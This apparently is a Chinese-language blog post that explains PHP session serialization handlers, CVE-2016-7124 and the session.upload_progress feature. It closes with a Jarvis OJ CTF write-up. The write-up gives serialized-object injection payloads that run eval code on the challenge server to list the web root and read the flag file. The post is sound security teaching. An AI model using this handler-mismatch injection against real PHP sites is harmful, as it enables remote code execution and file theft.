Iawen's Blog

我喜欢这样自由的随手涂鸦, 因为我喜欢风......

一. 储存session

每个session标签对应着一个$_SESSION键-值类型数组, 数组中的东西需要存储下来, 首先需要序列化。
在php中session有三种序列化的方式, 分别是php_serialize,php和php_binary

serializer 实现方法
php 键名 + 竖线 + 经过 serialize() 函数反序列处理的值
php_binary 键名的长度对应的 ASCII 字符 + 键名 + 经过 serialize() 函数反序列处理的值
php_serialize 把整个$_SESSION数组作为一个数组序列化

然后session序列化后需要储存在服务器上, 默认的方式是储存在文件中, 储存路径在session.save_path中, 如果没有规定储存路径, 那么默认会在储存在/tmp中, 文件的名称是’sess_’+session名, 文件中储存的是序列化后的session。

二. php序列化机制

Type Description
String s:size:value;
Integer i:value;
Boolean b:value; (does not store “true” or “false”, does store ‘1’ or ‘0’)
Null N;
Array a:size:{key definition;value definition;(repeated per element)}
Object O:strlen(object name):object name:object size:{s:strlen(property name):property name:property definition;(repeated per property)}

如果序列化一个对象, 那么序列化的时候会调用__sleep()魔术方法, 在反序列化时会调用__wakeup()魔术方法。
所以, 如果我们有机会构造反序列化的东西, 我们就有可能可以执行某些类的__wakeup和__distruct()方法。

CVE-2016-7124
当对象标称成员个数多于实际成员个数时, 会跳过__wakeup()方法, 但是任然会执行__destruct()方法。
影响版本: PHP5 < 5.6.25 PHP7 < 7.0.10
如果在序列化字符串后面添加其他字符, 该序列化字符串仍能反序列化成功。

三. 设置session序列化方法中可能带来的隐患

我们现在先写一个对session写入的php脚本

<?php
ini_set('session.serialize_handler', 'php_serialize');
session_start();
name = _GET['name'] ? _GET['name'] : "name"; 
value = _GET['value'] ? _GET['value'] : "value";
$_SESSION[name] = value; 
if(isset(_GET['clean'])) session_destroy();

服务器中默认的session序列化器是php

我们对其传入一个value=|s:5:"hack!";, 这时, session文件中储存的内容就会变成:

a:1:{s:4:"name";s:13:"|s:5:"hack!";";}

这在php_serialize中是一个数组, 包含一个元素, 但是如果另一个php页面没有设置相同的的序列化器, 则会使用默认的序列化器php。如果用php序列化器解释session文件中的内容, |前的部分被解析为键, |后的部分被解析为值。对|后的部分进行分序列化, s:5:“hack!";会被解析字符串”hack!”, 之后的”;}会被直接忽略掉。
所以在另一个页面中我们session的内容就是Array ( [a:1:{s:4:"name";s:13:"] => hack! ), 这就提供给了我们利用反序列化漏洞的机会。

php的upload_progress功能简述

upload_progress的目的是检测一个文件的上传进度, 当然这个进度对上传没有什么用, 但是可以允许客户端通过API获取当前的上传进度。在session.upload_process.enabled开启时会启用这个功能, 在php.ini中会默认启用这个功能。
使用方法大体是这样, 在POST一个文件之前, 先传一个name为session.upload_progress.name(默认为PHP_SESSION_UPLOAD_PROGRESS),value为用户自定义的一个upload_id。在文件上传的过程中, php会在session中生成一个上传信息, 它在session中的键是session.upload_progress.prefix加上用户自定义的upload_id。在上传结束后这个session中的键值对会直接消失。下面是一个官方给的例子:

<form action="upload.php" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="<?php echo ini_get("session.upload_progress.name"); ?>" value="123" />
    <input type="file" name="file1" />
    <input type="file" name="file2" />
    <input type="submit" />
</form>

session中储存的值为:

<?php
$_SESSION["upload_progress_123"] = array( 
    "start_time" => 1234567890,     // The request time 
    "content_length" => 57343257,   // POST content length 
    "bytes_processed" => 453489,    // Amount of bytes received and processed 
    "done" => false,                // true when the POST handler has finished, successfully or not 
    "files" => array( 
        0 => array( 
            "field_name" => "file1", 
            // Name of the field 
            // The following 3 elements equals those in _FILES
            "name" => "foo.avi",
            "tmp_name" => "/tmp/phpxxxxxx",
            "error" => 0,
            "done" => true,                 // True when the POST handler has finished handling this file
            "start_time" => 1234567890,     // When this file has started to be processed
            "bytes_processed" => 57343250,  // Amount of bytes received and processed for this file
        ),

        // An other file, not finished uploading, in the same request
        1 => array(
            "field_name" => "file2",
            "name" => "bar.avi",
            "tmp_name" => NULL,
            "error" => 0,
            "done" => false,
            "start_time" => 1234567899,
            "bytes_processed" => 54554,
        ),
    )
);

这个功能非常具有实用性, 但是在使用条件方面是相当苛刻的。首先如果你是通过fastcgi使用PHP则完全不能使用这个功能, 标志使用upload_progress的字段必须在文件之前, 自定义session name可能会出现问题, 因为这个处理是在php脚本运行之前处理的, 存入的是默认的php session。还有最重要的一点, POST数据必须是实时发送给PHP的, 否则PHP根本不可能监控文件上传, 但是有很多web服务器都自带缓存功能, 在整个文件POST完成的时候把数据发送给PHP, 比如nginx啦, 在服务端装了个nginx的反向代理肯定是不行的; 在评论区有人说Apache2也需要关掉mod_mpm_prefork.so, 但是我a2dismod mpm_prefork之后Apache直接报错挂了(砸), 所以至今没有成功的使用这个功能。

Secondly – in apache, don’t use mod_mpm_prefork.so
That was the problem I had, that’s the default in CentOS 7.
The problem is it causes Apache to wait with any additional requests until the upload is finished.

但是我们关注一下这个设置参数session.upload_progress.cleanup, 这个选项的意思是上传完成时从session中清除上传进度信息, 默认为开启, 如果将其关闭的化, 这个上传进度信息会一直留在session中, 把这个选项关掉后我终于复现成功了, 在session中读取了以下信息:

Array
(
    [upload_progress_ryat] => Array
    (
        [start_time] => 1535375683
        [content_length] => 326
        [bytes_processed] => 326
        [done] => 1
        [files] => Array
        (
            [0] => Array
            (
                [field_name] => file
                [name] => BrunuhVille - Timeless.torrent
                [tmp_name] => /tmp/phpI3trrB
                [error] => 3
                [done] => 1
                [start_time] => 1535375683
                [bytes_processed] => 326
            )
        )
    )
)

所以最终通过upload_progress, 我们可以有限的更改session。

Jarvis OJ PHPINFO writeup

拿到源码我们发现, 存在一个对象, 销毁的时候会eval一个成员变量, 并且注释提示我们a webshell is waiting for you。我们猜到是要用eval弹一个webshell, 同时我们可以查看phpinfo, 在phpinfo中我们找到了一下关键的信息:
session.serialize_handler的master_value(在php.ini)中设置的值是php_serialize, 然后在脚本启动时把这个值设置为php, 这给我们提供了利用序列化器的不同进行实体注入的机会。
但是我们要找到一个写入session的机会, 我们注意到session.upload_progress.enabled是开启的, 同时session.upload_progress.cleanup是关闭的, 所以upload_progress创建的session信息会已知一直在session中。
所以我们先创建一个辅助网页进行POST

<form action="http://web.jarvisoj.com:32784/" method="POST" enctype="multipart/form-data">
    <input name="PHP_SESSION_UPLOAD_PROGRESS" type="text">
    <input type="file" name="file"><input type="submit">
</form>

在upload_process中我们有两个途径改变session的值, 一个是PHP_SESSION_UPLOAD_PROGRESS的值, 它session键的一部分, 另一个是文件名, 在这里我们选择前者, 因为比较方便。
因为目标服务器中session系列化器的全局设置是php_serialize, 所以upload_progress会用php_serialize的方式创建session文件, 在执行index.php时, index.php先把序列化器设为php, 然后session_start(), 读取session文件。之前说过php序列化器, |前为键, |后为值, 并且反序列化值的时候, 会无视后面的东西, 所以我们只需要在session中构造|序列化后的字符串就能成功进行php实体注入。

于是我们可以构造如下payload:

|O:5:"OowoO":1:{s:4:"mdzz";s:18:"print_r(__FILE__);";}
# 获取网页根目录/opt/lampp/htdocs

|O:5:"OowoO":1:{s:4:"mdzz";s:39:"print_r(scandir('/opt/lampp/htdocs/'));";}
# 获取储存flag的文件Here_1s_7he_fl4g_buT_You_Cannot_see.php

|O:5:"OowoO":1:{s:4:"mdzz";s:84:"echo file_get_contents('/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php');";}
# 读出flag